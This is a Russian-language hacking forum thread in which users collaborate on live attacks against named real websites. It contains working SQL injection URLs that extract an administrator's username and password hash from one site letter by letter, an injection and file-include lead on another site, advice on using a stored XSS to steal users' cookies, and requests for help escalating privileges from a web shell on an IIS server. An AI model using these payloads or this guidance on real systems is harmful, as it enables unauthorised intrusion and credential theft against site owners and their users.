вот, наткнулся на это Code: http://www.fibromyalgiareveal.com/resources/browse.php?id=-1+union+select+1,2 Unknown column 'Status' in 'field list' А если делать запросы следующих видов: Code: http://www.fibromyalgiareveal.com/resources/browse.php?id=-1+union+select+1,2-- Code: http://www.fibromyalgiareveal.com/resources/browse.php?id=-1+union+select+1,2,3 Code: http://www.fibromyalgiareveal.com/resources/browse.php?id=-1+union+select+1 Выдает:The used SELECT statements have a different number of columns Не первый раз такое встречается, кто-нить знает, как это раскрутить?
ПаВлУшКа, http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+ascii(substring((select+concat_ws(0x2F,username,password)+from+admin+limit+0,1),3,1))>1
http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+substring(version(),1,1)=4 http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+substring(version(),1,1)=5 4 А в его запросе-Просто пробелы убери.
Вытягивай имя: Code: http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+ascii(substring((select+username+from+admin+limit+0,1),5,1))%3E1 5 Символов, скорей всего admin пасс: Code: http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+ascii(substring((select+password+from+admin+limit+0,1),32,1))%3E1 32 симола - хэш
ph1l1ster, а как ты хеш узнал? Я правильно понял: http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+ascii(substring((select+username+from+admin+limit+0,1),5,1))%3E1 Проверяет, если usermane содержит 5 и меньше символов, то выводится страница, а если больше, то ошибка??
ПаВлУшКа http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+ascii(substring((select+username+from+admin+limit+0,1),1,1))=97 первый символ ascii: 97 char: a http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+ascii(substring((select+username+from+admin+limit+0,1),2,1))=100 второй символ ascii: 100 char:d http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+ascii(substring((select+username+from+admin+limit+0,1),3,1))=109 третий символ ascii: 109 char: m и тд.
_http://top.warlib.ru/index.php?cid=1'/* так же здесь есть инклуд: _http://www.warlib.ru/index.php?id[]=000117 Раскручивание на замену нулл-байту ничего не дало, может у кого получится)
подскажите как действовать при имении веб шелла на win server, IIS, asp и php. есть ли хорошие веб шелы на asp (многофукциональный). есть ли возможность повысить права через asp скрипты? заранее благодарен
https://forum.antichat.ru/nextoldesttothread103565.html https://forum.antichat.net/nextoldesttothread93095.html
Такой вопрос: Значит нашол я посивную XSS на одном форуме с помощью вот этого скрипта: "><script>alert(1)</script>. Находится XSS в строке "Заголовок письма" (при написании письма другому пользователю). Ни как не могу въехать как дать жертве ссылку на эту строку, чтобы своровать КУКУ.
Т.е. процес тот же, что и с почтовыми сайтами ? Тут вопрос ещё в чём, я не пойму как дать ссылку не посредственно на эту XSS. Потому что когда я даю ссылку на ту страницу где находится форма письма, XSS так не прокатывает.
Если я тебя правильно понял то уязвимый параметр Заголовок письма и это письмо отсылаеться другому пользователю с уже внедреным html тегом и у пользователя к которому пишешь вылетает алерт при чтении письма? То это активка, делай просто картинку на сниф с куками.
При отправке письма, если вносим скрипт в строку "Заголовок письма" и пытаемся отправить. Загвоздка заключается ещё в следующем, если я вношу скрипт в эту строку, а в строку "имя получателя" ввожу не правильное имя (т.е. имя которого нет на форуме) то скрипт выполняется. Если же имя правильное то скрипт не выполняется, а просто отправляется.
помогите повысить права на win server. Microsoft-IIS/6.0 servet имеется вебшелл - asp cmd команды выполнять не могу могу запускать php asp perl скрипты. может есть в самом php уязвимости если он на винде, либо asp. какие есть варианты? подскажите где можно почитать когда такая ситуация. спс